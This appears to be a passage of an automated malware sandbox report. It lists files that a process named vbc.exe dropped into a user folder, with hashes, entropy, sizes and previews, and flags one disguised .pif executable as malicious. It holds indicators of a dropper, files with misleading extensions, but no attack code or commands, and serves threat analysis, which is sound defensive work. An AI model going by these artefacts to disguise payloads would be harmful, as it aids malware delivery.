SSDEEP:	12:WEMHRgaG7Oq6Rypby91dT2XV8vyy9SqSOQn9KtzFwTPSMJw7PYV7xy:DMx1G7SRyRE1dSFtyYZiGTPSMq7PK1y
MD5:	7F801B2F630068DE6D4B7F9358261246
SHA1:	9F1FA78880CC820B11BF4F50FAF02B47E717F0B8
SHA-256:	2BDC81B1E28470666DB0FB6E23AA590C4B9CA2E251170DEB506FAD164B8ADD4A
SHA-512:	5C0CAD366569BD1B221ADD033A111A2A5B17A117CB199BA3DBCDE4BFD6F2038815E8EFED40FADCA9D805A63CEC0CC8BD12CF6F50C1BD57F9AFC991E5F25AEAA5
Malicious:	false
Preview:	74442u09G0N700Yq4ygAEEd300Cirh39..5273lTr5QsO75A..7yf1L9G32D8w751Wrq2gD62o43eS9MGe1kA32FSnu0l54Ri5347718mTeNeX7eZw5s4ED16V46S2tMV52im5UYBh1r57nk0vQ458i7a31885RP..u68l00495g68lZ8094W221Mjk03894g..63efV24by8V0g21U2L2atYc7gH1r8j938D569M9k301KoKXBu6c6Z7S7d527A22SX6p5w0Xp608062792k68y80jXoW6FYi74P7HtH9oBxVof35r3..Uw60247993a6ZtbU3rUB7b13D4YGwC8Ks24xb4ee9L5Av1yLU9Y6z28rD9ZY356G2K2..Sa1f5KYsA47ymA6388zJ6MSQpk7z75at005PrR61eL9t69b50dMqu35r15v7lH0a96o0i82OqofPg712Ky1y2..IWC85L..B3916i4cD9906Z381tW6xJz7W1b841rXpa8P45EA6NEg9771V5R2Y25r693Xm83Y7epLAYL9k4VSfd3DhI1623XpI50Wh6bWay3FlL53Iapo095whR8km7Q57ZW26K66LbdKnv19G49y8tt5SpW3182k..

C:\Users\user\33920049\dopnobhqej.xml Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	574
Entropy (8bit):	5.3882957771470705
Encrypted:	false
SSDEEP:	12:IynViaAcFBLGDlBRqNZJC2Q/nrsAF6eCyh3kOIiEuP8G:WcfMYw2OrMd+3kOpEPG
MD5:	9F6E0D61C826AC091CD857D118713477
SHA1:	327C7FD7ED8AA08C09C104FFC7BA15894C25424A
SHA-256:	44269193851D3CEA2ABBADCD4DF83DEF02397189A74E239D0719D9D2F69BA8FC
SHA-512:	63038CB3D42BA8A0C20957F2D67719217FE00A6A85EDB18C837F4779160AE65B32F3D7BEA9814CCD02CB90CF92B8027C20D2524647C66CC36B31B9FC45C98D1B
Malicious:	false
Preview:	M041g15259W98w2l84hDJ792g0OKe81MI1U47G340a9G63763N5193G6Nc4T8ij6yd79z90pq8541P04z84KX01v81Ou6eMR81xMh090i14Pm5Hx0hU3Xq6801b23z570ceDt1c640oeh4244IPxC0za0I6P3o9hT9..q8zuT464596Q..ynjZ10Si95D9p9034wD9rPG923e3w64MQ9Om4x9MD4o6a48c5E42XH7YN93Zd4C3O047KH9G4uBv8467jw79X247D488M68701X2623..rdxd928740r5285uh4O3XoT9h9e54e2p0z06n0I9e2a926Utsx1qU2Qa3U02I6a7899457K81gd61732WrdAY3200GYumf7drDy7Ip99ty97b8F..n24xt9nJT0572D5r5xn9BEWP5P6f777R832..rX0QU14dS95q46eqjM36PI6w787q48gU7Q4F84d12TD2Z11UM5ukFf46lo2kTf41613syARA7W6Gd6y4n3769tM50jdC9LF2t423b78LK86y96pNpeBu7NP0zI58l597209030I039g..

C:\Users\user\33920049\dwipjhaqq.jpg Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	565
Entropy (8bit):	5.568775268532097
Encrypted:	false
SSDEEP:	12:puQF5w4r+LqEcY2/ioIPKtpzzFgOv+7rg0/ScUocADn2:wQ3rrDwoIymO2YrcyAa
MD5:	A36CB4828F8264BF744ABAA2F8842B53
SHA1:	1E0B2BF80891B29BD078129A90364B14ED95EE57
SHA-256:	1F7F52165714243C75171CCDA40E5E0C66F8B6EEE59C2F224B9C5033A7D32FE0
SHA-512:	4032EA58CFB0B2A1B333D306A43AF6F1BE6FF8342F09F22AFC6072F601C903174D8CBA893C71984AC7814548B27C6B3CC4FFF5C046408E96C96397CD4003B057
Malicious:	false
Preview:	4M3h0Rw700K2tH81iPVxYFL3yaj81c5f7fP3..ToG0A6WwPam6R08..Rz3011XwEl9..P5qb48A64ON490387i5X0z3ICKLY58pNWLy6C8a999W28x18D..VaF2691v5FQUmw1N9FMxvtV18f84c024218TK0tLX3VUhNP3R8852e45ve4lj4V6Rq2P3i27T1dB7a6ER6q5OE4O8c9IYA4e3v1d1501yFIL44XJG56qp0uIjV3Z2j15041p9S65663rWdm2k45Zn3O..51O8y4lP9217QAlu4dD4H4413281mm170962OGMTtv3c35G38P31o62MGo5r9zx24j81b9IsWJ50LUM3Hm9fYF46nC1kQ269UM0gB8t52w4i5072t6CQ6A177DB9EUHF7h4IIR0fv3pn7xI5NUfiY5C97A5..59EYK388Y9Mhe35GYGR50L94yRB..f7k39qWX4t5F0G4f6B828I88X7F6q5gY6CT9n607902ja2x01L7LyD47s98dZl7fz0mR2SuH26Sk108E322n61oo6G60332k4bV59f6NF..

C:\Users\user\33920049\eeppjmhbj.icm Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	5.516485008605424
Encrypted:	false
SSDEEP:	12:Xo6hrLh4fvDosoUkZajbPcdHcOgRsSHesaKEQWSTdoT6rQpWvn:X5rL6/oEbPcFcOgG6esafShz6Wvn
MD5:	4050A7160604551C4CB625F60086536C
SHA1:	4110CAFA390AE23E74DC5B110CE98F0C3B342CF2
SHA-256:	8AE0F3572F5B03EFA9C93C88E62F61DF4C59341817BD5E883E7B0D48A82B2346
SHA-512:	75335BDE6AE3B4D4DA060FB425E02965B62CB6DCBB52EEA6F52CC071AFA8ADBD0176687230123F850FB6D097ED36357ED283C2707ED15006E5719AA24CD5883B
Malicious:	false
Preview:	67iuCF1c4N85L87b7KKDTk67ry6XW8L7njzq45q283zYDp4w8l67msr0do972..52XQ488PfD7P020634s937H3By8yE..O8HcogrgwKop7s837c56g6KRN5j2RU98K6I26SoNZ..841236lv1941K3jac2N6v4ABA538Z1l28BUY9hKwv9cf6Fq3U20tSm68b8J6j4wc46G250JS99203M03h00ZqFlyH7M5752330LNS19B8170T0r4rITz2DH7KdvVX5..2oVq5659S7238u0CCY9NKU2bjc74g2s7fRkn1VM0jcwFW212w1cCs21l53B46249aW2584tVm71T452ZafB..L60ze680022X4Vf7zrW120az1G6Wa8Nh337RDbt9h9s0MQFiP..93B3Jbk51F3646kSd7A4t9X78P0pZ93Zwg3075RJ763EXT296F3JllnYQEFSJ69E6..BHPU8K32y1338b67Y6qe9694X6M31H302673N53N4n66L7G5tU9znqkBB5c0PH46472d3SATD3iygGP711Z328x1X550821387q906jv3aMd66h8A5reS8Y739K..

C:\Users\user\33920049\egwevtj.xl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	570
Entropy (8bit):	5.5477291315599615
Encrypted:	false
SSDEEP:	12:/kIF2BqahGlKUEq4YCQeFq20TD6QlfkL8GCuKLB6wWem+HixRnoQ84qsK84:sIlEdltFb93L8Gwqe/0oHP84
MD5:	B8B1C71088CA6B30B3029554CE05CEF8
SHA1:	67D1C180AA7C8B079819F9013828827947456D29
SHA-256:	A5FC7DBE940C698DE68E900516AE4EA33BC7B7AB2435C0D5B74E9E474A58A09E
SHA-512:	C262AC053268459F8800BF3F7BD219E0C0DFA063D12D1EF96D563EE60F337C99AA0FC69496A535975A0B682AA732C0C1741D2748D4ED783E2C2E0D0ECA65D01F
Malicious:	false
Preview:	xjv7HSA9163Q94401EarUCp317HVZ826n0u1334J4s99160I09Iu7Oq0lqU20Y3O7hlu4038164bq13rI65aPJ1C4hqnDAwx0IxYKS5s0458gtY0Im8C7w55W9n04Vz3Y15oA2Knz7qLEX6n043E1Q0j5OC357p..jK2283TuR..SC9g4uT5XpwmR..1h909j4F555Bn86iNvPyV2N0BY70IET344F4U6471ecr5v45WO9K72J81Ky3..dxi4tbs70w..OAAoH5h70347vEz05dpRR9n390G1XK57Y4ati87p44y7K199frf1bVs118mW3709JB385uk33sI80at12cP9qSmmPa0k3097fg50itw7Yo3..0ghuk8K85Al809..1U4k778WgW10jK6I907rAUW1wA109l8fjl3TH2R9t32s112iTt8466T77S1ob5vI6jIW250RuuW8miX960BmWd1z66vG8332n8f4S68p492a3Bj7dH78hryje2uw8auR8w2C3918Z5OjD9f6dXr4T6bUxU4wj3K51MtR98gN350Z272S8WmXBt..

C:\Users\user\33920049\ewkvwqles.xl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.527751285637128
Encrypted:	false
SSDEEP:	12:enqYhOyfzX8x2nPPegEhlSDu30ExDkHHiD/Gn0:uqYhpfAxSGhlSy30ExKH6O0
MD5:	A7864C4D1F211A09CB7BCDB60FC1BB9C
SHA1:	06CD14C958FA5C0870C3148BCD874208D6EBA192
SHA-256:	D3BEFD3CD87AA43091B2043616C0D57B5DD5C86A9BBB933BC7F1CE359FDF2848
SHA-512:	3659FAB569E5D7FF8F509EF2B0B2385EBD80114CD1ED782B19A440131FAB50EB6AB489A9A274503BB08751B5173E97E81B8931047DC1F6B7C440558B80AB34F2
Malicious:	false
Preview:	6NK42n6r92q74lD845rJVr4ZDDPa7dqi672tQ1Mh0ma5hE5W127e40U8D4d6q4K157NCE5PR0pC9W5M1707r9k2gC4P8E5kZU486ZdBEizbh02X0S8D5095fx1b732t229q4J37ws686oEKo09p9t6017lT0P0oRd..Y5AIzxe0GL7y4o6apa42dji73791I1..xyzf4j39l852K5Y77cI5fN36Z2CqG8q3H..rZZ15D93u3yvm0Q355u9Q4PyJ2aL2787FF6XCb5a0b..YJkR5hE93i1z421qF0TqJv01e17cQVG4WWm3b63pr9hSJz8Hnv242t02e1P8k78F86L3R24578r65lL7Q72301s4wxN9at0Wff5w9B04rN9mf5cDh..W83G0vc1xyM774C52aFH1m35GIP12q1w43qanvHm972Qax458NkghP5Xp20342ZUef3F5nfOZzx15c57q597304H1h463szzL532y02575nVXBm490A8243701393R7HP0R4XdAn88RU1b3n175Gv84qN6..

C:\Users\user\33920049\fmkkelc.omp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	151163464
Entropy (8bit):	7.076418205558757
Encrypted:	false
SSDEEP:	49152:EcAALhfk8v8UOvPpDnYZVOCzhK2BE1Mnu8oQLpzEwE5AhbaSpqX+FST+CJtIJlz6:A
MD5:	66D7B16F566AD4D6F73CD6083C7B1D51
SHA1:	C71715B2546908A05A28A91555534F04BDF11432
SHA-256:	440D3B688F65BD11C021206C50D7B7C4A75C7BA66BD2E1AA4137ABE65D41079A
SHA-512:	7EE084C1DA1AABE2F7FCC084B4A9C5A9E5CFB86FB4FD45BC6EE08CD3E67FE41380D8FA0F0F312EC50198DC50CE230E36127EF5931ED455D9CE61EFBD43E1A0CA
Malicious:	false
Preview:	..;...q...I.&..m.y.....7.e.......?..h.5.......R.I.V..wq.........0..../f.x7;...J;t...)_.1....P~....Y.......q..F.....qA........[.....#.c.s..N..s.......)..G......i..oB.-..Ll..S.AN...p....=..]I?qzO.:.H..-.?..KH........]...T..z{...mkQ_b$.Ld....g...S.zX.mT...Q....y..W....(EdK_......U......8I\,...d.kZ..{P.;!svF......T.".vX....^.O.....g..LJC`.V..b..%....LG......H`-..=....T.s.s.v..-.......C........!....(.Q.I.....%Zb..:!.'..'.L.b.P..'EZ..:..Y!...?...j&..J{k..?;a...'j.~=M...N@....2.wVN2..L>.......7.$.y0.....sr.kt.j....Z.E......4)/.P.>.D-..}z...3?.RqXNZ..a..l..P...w..(8.s8Em.)?.bs...L.......vNg...............D....Y.. .H...(5Rvv>._.Ax......4..~?.../)z.......gq.,8...5..s..M.6....IN..<........y..l.G...lv.1..je>1b....W.OB..4.Q..."...2>.X...@.9S.. .qj...R.n.3...?D.h.B..e.ES.79.Z...Y6i....Q...8.b.....i.5.8.2.7.e......4.A..x.&.)g.......C.wS!k..P....5~Cw....j.D....v.....6.3.G.K.N.7.n.w.2.0.n.e.0.j.c.9.n.9.5.9.6.4.e.8.z.Q.H.k.4.2.s.7.Q.m.J.j........ax.......e

C:\Users\user\33920049\ggaoddlfq.pdf Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	581
Entropy (8bit):	5.484135377500105
Encrypted:	false
SSDEEP:
MD5:	97DB150F517B42A67914B55B9FCC0855
SHA1:	53FA78E1F13BB71038D02D9C8911415B5C2912C5
SHA-256:	D4FC9603286BC88744BDA31D71B8464EA7CAB510244B3C21128774513302BFC8
SHA-512:	545A19B01D8423099C1CB414B4754E10C7C1A98ABA50BBEB7330B82843BEA877DB761156CA6B306EC4A67954CAF1E9C0493E0722BB6345B19CD8678E6A7BD532
Malicious:	false
Preview:	L60IP8VyXr8j652U7c4EA16q506Yc267O5B7n4W6d9EC6Wr..Z5233jgEHS42S8jkR620DAZ8w68m60520LFT9bEhlgC9mDpBzH845DF60..1y528jK2RP5V39890u00G3624K55R112O0W6073G86rY4ADPJ0L23378Rb24UXE3H97g2MHvXD93aS29..j80ANqDzZO2kb9125241S33538C7w606w6v35BFaiy1l46Tk2Vt052qKd2nR7r29pFI8L..GwNQ1wcq3EG2WHRg58C4yriBtymd40H4dUHL247P9o3VdRAI267l371CPXW0v98Su8a73XEsIz746545XG7yOqe64Z5Y00j82g24j4q02Pj159YQq08UQ8..417n1LPG3O9nb41794272W58hcC2Hyv38L91361m1z74TMlz16EMi3mbdjD3394B8Z3k99u92322eXEr1..Dp706GD6R69y836495M79uL245i5P9508eX256K24ao04S25B18167xLpZ09h47Vd4bf3QrqzPKU5T65ynrizaEl10Q8Di30790619Pt215NEVV57Hl..

C:\Users\user\33920049\hmjc.jpg Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	582
Entropy (8bit):	5.508024577075607
Encrypted:	false
SSDEEP:
MD5:	DCC53F5459120236A9DD260CBCC7CFFF
SHA1:	4039FCA91DD943A269B6180906E347F44E26AD45
SHA-256:	2DD6BC5BC770D576565692E8D014611ECE5614A615B83832756959163EDA3329
SHA-512:	AAF0B1864FA1353C8BE403BA257FC86E963AA1C5C6343CD83AC9B47F4D4AD0C4DFF12589C17E4BD0DB6F626C8446332BBFE87819E2ED37709DC1DCD59909D54A
Malicious:	false
Preview:	6TZgv2r6O98PiGO8Bh7NU14GOCk793S2T03rq31B0hy5OJ7PEoTnk815B9zq85mIvt29Y6Cg6SnKsBd489773Sj513K9gClId8645479Z6dg75w0o2j3wR0Jd93k900GlzNd..OhBWTv50bvjel9V8Hn1D8g608f604Dxp37E77B8xetl6R7uElCk8jpS5i7BkYNxA7jM6O90y9O..u267m58f5O8C2v0Aj692c2rh6X2l27Whby14k6p0n9A75RI64m06ZTlZRG51Q0H2PPHx94iY1348z9K14W6Iy59y513dMFAUWZjxLF32714ZlP58n5S216w64v0pT5J..4c4W592OCU2498e97AP7tP54788328fF9dSY1k421Iq3810W4..64Kou07keHf2K103H901f4TS8x3594704LK009837n6v9380qA7U3qr2Zo30ZtjN3A9nv363EeO7StediyWh19s1665H9H8W4RKO01G3844fX40p6TkvnGwBGX7R3OWq20t3e4I705e908r1c0WjO2213q3507e28y1u1Y7G7QT22g2YyO9X09hUm45sh5..

C:\Users\user\33920049\ipltm.pdf Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	551
Entropy (8bit):	5.404238302840432
Encrypted:	false
SSDEEP:
MD5:	239B0A24A1A86CDB9E336BAFB9671B60
SHA1:	D604B815B4C5FC72E38700E060016980CD3F013C
SHA-256:	F71F990B573AA4CC7724769C08F9EF0FD5E3897FDEB567966323E1AA5C7AAF84
SHA-512:	8214623D1FAE28F7BE93CF1F762DF3BE8475331613FA1949B643D6A739FD5EA705789499E91D1A8CBD25FA8159F0450681EB2D3977B9B698B89D1332245DBE57
Malicious:	false
Preview:	27eVjsZhC09FTf59eg4E80Hf5aR9z867Do5C984995469Me62Kn3MYF72V58juX5QZ27Bt0X33295lds87mvzB7il1649F6481nWyJ1td54Pm758615wJ4e..xF3gqw4xErwn85099L42448fh405T5702d7x2S52c53hL0Z33J61AQJr8I..GL2ASEC1268x1d1J76QK51jo8L3x108Bwz6781Zv35NbPkV30406BEK7CAY3GM123hS79z2xyL43769e9Xr6h24u33U557S53334pT6h2Sqo6989..tbo1742YcZ1nE04NR1961860q1v42mVFGNL2d6JVa1683E48Mnl8d2r21D0MX10voM0X90oJY1A56383e4222a4P24SbPac0N8E6S6q6ha78jnx2G4H2Q2CwF0988v8314H38JR..KlO082yx7r10VD80057Y6P9D9fY87Q98740R629c1YdL7Hs4w1N6w82T0jxa4KhC46522l4qX194gvn05t68u6147O268Xz8Lw9T19N695oJ6S5F0x941..

C:\Users\user\33920049\kwhibpnou.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	566
Entropy (8bit):	5.3766864975280875
Encrypted:	false
SSDEEP:
MD5:	D60ADFE8CC5346DF0C2C5A191039AFB7
SHA1:	B2760A6B3E71AA9441F771A31FA7CAB80DDB792C
SHA-256:	4D5CB8CFF9DCC0F1536CAE9299295B4422F49B8377FDAA9057427AE40D74EB8B
SHA-512:	F7CD8F6FE84970944955343E5699BDFDB05174E9CEEB3AFE2ADA12B2F2BBED4B945E8B2D16B9B7AD1A796C37DA991E3B81F284076170805CD45665873411A767
Malicious:	false
Preview:	Qp7VxBTqkaI64icS8B1C513riL6X0A6cB27O2Z932R4Bm1T2b3WzoQ96N0fp1M3x69f11t62o1Q7A488p0472QK4Wx9w56mx663h6n11n53e1ix194KNk295v2284mw0y09IPEXD37c6AFr5F344F13n81x88s2KlkM53Os9u0XE8868u..7EbC1ws0wR9778U88034J645l21Z16E8FTPp80U8MT38R3y9u4FY070R382sve8xJ99mOD7..10cKFw98468v6E5636uv3l17cv9r036kGr8aX142AqTx667e622Aa727A32rI43FDM31v1w0Uzxsn9r2Bm4afK0314D571B24T1U7651jp56r996515M7O0t501615782n371..64X27Ucy58l9Q2W2C0Px781420P2N59j2Y895PbAmu0De379MvT2Q50MA10421375xX6L0T475A8Y..1w4XSx8276T2594X2Q1b9q4632iU4qUR59C92Q4c3u8vn1zb6ubNyq1K050hmsbY0R99q31nV47xS6q5EHW1MTh4Jn3fz7r3BS..

C:\Users\user\33920049\lueww.jpg Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	549
Entropy (8bit):	5.509794522095491
Encrypted:	false
SSDEEP:
MD5:	F25CE49283A8CBCDAE2F3D447B00DE0B
SHA1:	5ED22433392F6FBD1804EF94473CF465837575AD
SHA-256:	C6B4F1EA2A48D13050C20A3D4CC3614909E694B494037432610053DA675FC627
SHA-512:	2FAEBF76B5DDD7505BBBAD4B6ED730667BBCE856C10FD476E28607B0C41E409FC661360F39607D38F5E54AA5CB6B27403E9F54A3BD918AA127FB7AF55C0094D4
Malicious:	false
Preview:	q4KlYkM8K7KM9dTa2..O05bC2qu9fW2a3S91357EO2Uz4M59J55eL65tm397YG6o67d915gQlA7S741S9bY6RvSbdS71pC882XwPAEX..F5DbHvcLJ76H5W6S666gM1143f5va98ul5Zt4ET9FoD..86S7w19on3Oz1Fxjknb3q2f202289174u3Jq37K702OT52esq499w5P4657o551Gi2osU9cb63U3Lk492AY800101en9FTPtTqO46G63SM2Q8nT35k4868Tazzx3SoyYNO4..6J6852X5y89mY22Jg9L5NX10zryN2SYsk09235f1m8H6JMxz871G419XpAM5b86705530DKi7kcpF0..2XMT91Iri7qxaO30t39887Ux9J01jLDQ1eY3S4Q94q79qS749dz234mW2b9QN82j7ew0A6PM..iwW873592D8T8Y65VGfpr4uu7b0TaV99s02eZD6936q36147yvpG3606SL65Py0uR1s0Jg9332453UmkwD16JcTXNTM009r582856vE4QbVAKk..

C:\Users\user\33920049\lxvjfmbxgn.icm Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	529
Entropy (8bit):	5.417334677129549
Encrypted:	false
SSDEEP:
MD5:	B8D1527AD41B6877D1B63609604A2114
SHA1:	831D9DB5D7ED05A8397EE8A3E34C35C3DC769CE0
SHA-256:	86DAACE3C786D9AA8BBDBDA09F69456A0260A20E5AB4CFE9A02628A73A9E0AA4
SHA-512:	15DFC12B02F3D8F10A1785BD192C1DB146B7CDF12AA1B1CBC30700F24DCFEAF333A117221C45BF65225B249F88A3506C77F57B2667DD50A851DAFD32DB604D7C
Malicious:	false
Preview:	D1E8h2HEX937c5F63ws5Hy095U3mf9Y77980..V00K56s224Ejgp1J9M7f6Gf912RvvQr..01t27zB04..4ugwZb62895b42g5QFtR097yD5Ky9g34heCyxq5Y3h4Zm9qN8LwHQ89088680hKMCOCC0hBc05kRm3P28349HdnbADp7oi0I42O124eT5t6V995A3ruyCVG0f152985Ai1c3dP6UTPva89094B7q7Jq..B2j1v7152u912E6K1732305X05621350nS917217248LwXgyb9697H6juS6f58cbWuh8o7H3077542z5g02C22Aq9600q0L8r5EBo3841L87X99DA1KTJ5O4NR939Qg06l9ZF1z40L7v88a0901o..fT7815R486y0u9U514P824n89A9pN9587k3HI2L44e82..K29Tq0J9Q2mN0X754YL65LXlT4D893J4esJZ68h2ZdA0c5G2405v692St6I6C7nCd88dg579010909EqtbQ29PuKhcmQ1Y7F..

C:\Users\user\33920049\meuuljggm.jpg Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	608
Entropy (8bit):	5.599021625489054
Encrypted:	false
SSDEEP:
MD5:	909355BA1B2ADA7E01CB81E2899B6B96
SHA1:	98ED232FB52CB179C60C6988480BB28D5B247263
SHA-256:	8ED9F9F9295D32C849D9939BEB83763955BC0C6925793FADB4A0A0735378338A
SHA-512:	C15AD4E028A05CD34F0C22B4DE80B61A12B901DE4994083C9717C9B4F3BBC1CF29431894ADFE3B7FEC934642741AD9A4226FC9EA6A2B3DA91D351387A2F61BF2
Malicious:	false
Preview:	6d15n35xEkeNzvd8QC944717Bh2FA0xw70aOlPK18GE476j31Ln35goNmgC7yE3H3yjvwObH7t0znM9i024r..8RI733eZy64eVk8pHX2w1SN5y6v6yNKdry7sIq6bGaKU6b965019b477O9B8P..n0ZH6GU1802M3nK9S0v5lo398C9052955p9f603b8CW3K..Volo5E8te4h6j95z7ZVlgh31Jn13KO90MH24gO1ng3nnE52fphIaR885A39UeNy2Q9m0860ah5qV21790rvhK31yO7Z745c72MqBmngr..2IKl67mKUK6s14WzI1kBr4MNgTP83133o40Vsc4VF9465nu..9575..g63DF6si6uA7THw5dhOXgww16771k6hpca8wdag3Y20wW245x61TN8236OiM8E9A69o8lUh29yGXR207Oo2fKM6x8baR2F8A6k39w0757aw0v..0H7P30G5146F971454dTaypI05wZ6g8YhhUPw030vH37GO510LHz43BU4nf7adSF23ceZjWW6NV8d0O8fY2gF2g402biuDsTK336912d78q0T2R0XR0L5N97igRC159yix7I96hLDd..

C:\Users\user\33920049\mmbdcs.xl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	548
Entropy (8bit):	5.47877878102614
Encrypted:	false
SSDEEP:
MD5:	1A4DB14134A67966C903508FF04DCB28
SHA1:	612D22CDCF9CA81EBB295642346E3F0F9214D522
SHA-256:	9C66FABC8AC533B56109E3BA00591892A18B30831DE74B933532C5727E0F4AC7
SHA-512:	3B3588CC2686AE47E1AA66DB11D2EBB662D0C8F99DA8049BC1D560289D9A06E194266260D918D515B3470C7684DD85FD989050BE63CEBF731D89A6761102EDEF
Malicious:	false
Preview:	09JF78Fh11lv273Ap1ugc9E7cGuu3..2tytW281h9C2PDSeI1lY1EVqZU..507ie6QZ889TNk3B91If1328iy39Xs8Yu4S88983G2916P25eY6k752X8zW08k3c7g33330om0d37L35Ki2Q791T48aO6b0S1r5UmSzw918VUxlH60Zr0V707Ad9t3vq62A51379S3g48580g6Xz9dX4aV5G15sS2K6rV7808ztG2howf42lydQp65..c950bpN27Zd5x16608tZ2BYeT51aisEmMJQ54k32Gj86M586D777E11221Kf7158Ef4Q6n740t4nhsjplG8..aD9O2o33Z03ry292VH0774ndw15ng5Pt61O127kc2O329355b56q42871SI13YswAz..jbp0jJk58X149s095365Tn0141cAZ7Cn71W47HVKMG0HaC4zi624d777g5G3135G63Y69RE09g9s30f6QQaU9q720E54fBQ0787U21HouAz1Wc08P3S1Qh8218a06NW4iDN27AX7uE3FtliR53..

C:\Users\user\33920049\mmuiqlcvwo.pif Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	777456
Entropy (8bit):	6.353934532007735
Encrypted:	false
SSDEEP:
MD5:	8E699954F6B5D64683412CC560938507
SHA1:	8CA6708B0F158EACCE3AC28B23C23ED42C168C29
SHA-256:	C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
SHA-512:	13035106149C8D336189B4A6BDAF25E10AC0B027BAEA963B3EC66A815A572426B2E9485258447CF1362802A0F03A2AA257B276057590663161D9D55D5B737B02
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 27%, Browse Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: KRSEL0000056286.JPG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................0............@...@.......@.........................T................................c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................R..............@..@.reloc...u.......v...H..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\33920049\qhqulleu.mp3 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57578
Entropy (8bit):	5.578086176536263
Encrypted:	false
SSDEEP:
MD5:	5DC5D3365BAE36FC41072D92D22F69CB
SHA1:	91CE48060DCCCC9806AFB9979A3A1759041036DF
SHA-256:	067820A70679BC812C16421E4F759533DD91D8124ED36966436601B1F2013C94
SHA-512:	CE2119181FCBDA7C1B08068F918C7282DEFC8AD951E129458BB75F6CC9EC4CA105482B5F4AAC4C16E425736FA45DA790D10B4ED9346A93B23B4F4F713A912A85
Malicious:	false
Preview:	h2p1f27k11D4928Yg10sp4yM45..N0ev22LGA972g7108t53666312NEQ936013H6IGyekvJ71615uI45076O1PbOp00bA59fZew2Q3uW74G1..k861Wl190Fi62..u038289Po5303Y375wD97P2t0nAp79EjMGK3wI35dT61673071a86A620afy8DJ870rVU48212I8s..ncD25Fb62q65jJ0HVPugF6Yl7X7Eh0i993D1glNppq17371g73bR49xhOC7w18T9St7n7t6VA38VV077l5NF92F1F..e6Q3NRFdkG1n39Rd6h73S234193I5DKK125k40h0YM8838N3299r82GUBMO1Yp3G90Iw45xJ7P33jr6f54rDuo3GVzlg63J..j8A8nb2007l654wnz1y587053Z98G2W3Xy9800UO800f..4cB15n61ea13513367yB73oJVg6c..hOi4T720885078n0fh5i8Y8C5b235f8Y0..6PQm64Yx0AR5VCwDF77jt5TP41949X26Q1Fz3uz6059s8U364jW51iZep4dp7084LpOw..O4o2V8ELjw7l8111mlDOskR3Z0b369z4P43g220128bCH43235sh72Oz2B11Mo4d..5UK7HGAHv664260sU7J31..bP98bUe5lC4453Km3AGjhGF1bb58Qzj6k6C834Tg95..d0j10z556j2bC471373U8o8HhEi5222I1q3lUt262J803vC24t5dl6Q30eK0i6r3nMO8F141JLXg8DHv2M7Zy3s24..P0rW6Eh4XgHS9F4n79T8oQL0T9v3p77qi5fX888Zy17T3o58OQ69L213E7..qotNsDVE53Sqb17Pa42ZY6v4125671zj5S75..F3o864Et7a6069dE60Or8qp064D78XaH4EjN46493QX7DoM0SGp0881..Jqd84A2MR57zhMr96439g32590wWg025KOo768L987y6883

C:\Users\user\33920049\sdstvfk.ico Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.3732701590754415
Encrypted:	false
SSDEEP:
MD5:	84DFE2A08AFBC32793395799841D38E4
SHA1:	1E040C2A1032335F15C39C60A01343A58889B5DC
SHA-256:	AC294F23A91818659CFC3210CB058D3D9C7DDA4EF9D4CD933269C8428DED3AC5
SHA-512:	9B6B65C14499CCEB0FE8276CF33CE9B92091A7D1EB2BE8DE4497F7B418B57B70675BCF706425630D9210DF7EB1328E443F4D2F08B0CBD088DA579EAF086CE915
Malicious:	false
